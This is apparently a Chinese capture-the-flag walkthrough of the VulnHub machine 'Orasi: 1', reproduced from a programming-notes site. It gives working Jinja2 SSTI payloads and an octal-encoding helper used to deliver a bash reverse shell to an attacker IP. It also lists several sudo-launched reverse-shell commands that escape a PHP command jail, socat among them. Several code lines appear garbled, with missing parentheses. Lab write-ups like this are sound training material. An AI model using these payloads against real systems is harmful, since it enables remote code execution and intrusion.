vulnhub靶场之ORASI: 1

准备：

靶机：Orasi: 1，下载地址：https://download.vulnhub.com/orasi/Orasi.ova，下载后直接vbox打开即可。

隐藏信息：Hint : just one useless little dot，在下载时发现的。

一：信息收集

1.nmap扫描

2.ftp服务

Sometimes things are not obvious
Element found: 36

逆向伪代码

 #逆向的伪代码
int __cdecl main(int argc, const char **argv, const char **envp
{
  init = (__int64malloc(8uLL;
  *(_BYTE *init = 111;
  *(_DWORD *(init + 4 = -1;
  insert(1LL, 47LL;
  insert(2LL, 115LL;
  insert(42LL, 104LL;
  insert(4LL, 52LL;
  insert(12LL, 100LL;
  insert(14LL, 48LL;
  insert(17LL, 119LL;
  insert(18LL, 36LL;
  insert(19LL, 115LL;
  puts("Sometimes things are not obvious";
  item = search(18LL;
  if ( item 
    printf("Element found: %d\n", (unsigned int*(char *item;
  else
    puts("Element not found";
  return 0;
}

习惯了先看伪代码，但是这里没发现什么有用的信息，后面在程序逻辑图（ida view-1）中发现其寄存器的值连起来是：/sh4d0w$s，猜测是一个目录信息。

3.web访问

4.参数爆破

二：获取shell

1.ssti注入

{% for x in (.__class__.__base__.__subclasses__( %}{% if "warning" in x.__name__ %}{{x(._module.__builtins__['__import__']('os'.popen("id".read(.zfill(417}}{%endif%}{% endfor %}

2.shell反弹

#字符编码代码，替换下strings即可，后面还要用到这个
oct_result,dec_result,hex_result,bin_result = '','','',''
strings = "import os;os.system('/bin/bash -i';"
#bash -i >& /dev/tcp/192.168.5.150/6688 0>&1
for string in strings:
    one_char = ord(string
    dec_result = dec_result + str(one_char + ' '
    oct_result = oct_result + str(oct(one_char.replace('0o','\\'
    hex_result = hex_result + hex(one_char.replace('0x',''
    bin_result = bin_result + bin(one_char + ' '
print('十进制数据：' + dec_result
print('八进制数据：' + oct_result
print('十六进制数据：' + hex_result
print('二进制数据：' + bin_result

#原语句
{% for x in (.__class__.__base__.__subclasses__( %}{% if "warning" in x.__name__ %}{{x(._module.__builtins__['__import__']('os'.popen("bash -c 'bash -i >&/dev/tcp/192.168.5.150/6688 0>&1'".read(.zfill(417}}{%endif%}{% endfor %}

#shell反弹语句编码后的语句
{% for x in (.__class__.__base__.__subclasses__( %}{% if "warning" in x.__name__ %}{{x(._module.__builtins__['__import__']('os'.popen("\142\141\163\150\40\55\143\40\47\142\141\163\150\40\55\151\40\76\46\40\57\144\145\166\57\164\143\160\57\61\71\62\56\61\66\70\56\65\56\61\65\60\57\66\66\70\70\40\60\76\46\61\47
".read(.zfill(417}}{%endif%}{% endfor %}

三：提权

1.提权-kori

<?php
array_shift($_SERVER['argv'];
$var = implode(" ", $_SERVER['argv'];

if($var == null die("Orasis Jail, argument missing\n";

function filter($var {
        if(preg_match('/(`|bash|eval|nc|whoami|open|pass|require|include|file|system|\//i', $var {
                return false;
        }
        return true;
}
if(filter($var {
        $result = exec($var;
        echo "$result\n";
        echo "Command executed";
} else {
        echo "Restricted characters has been used";
}
echo "\n";
?>

开始使用下面几个要么能连但是权限不对，要不就连上之后无法执行命令，接着换shell语句尝试，最后发现socat TCP:192.168.5.150:8899 EXEC:sh可以，然后获得新的shell权限并成功提权到kori权限。

#出现问题
sudo -u kori /bin/php /home/kori/jail.php sh -i >& /dev/tcp/192.168.5.150/8899 0>&1
sudo -u kori /bin/php /home/kori/jail.php 0<&196;exec 196<>/dev/tcp/192.168.5.150/88991; sh <&196 >&196 2>&196

#最后发现这个可以
sudo -u kori /bin/php /home/kori/jail.php socat TCP:192.168.5.150:8899 EXEC:sh

2.提权-irida

3.提权-root

编程笔记 » vulnhub靶场之ORASI: 1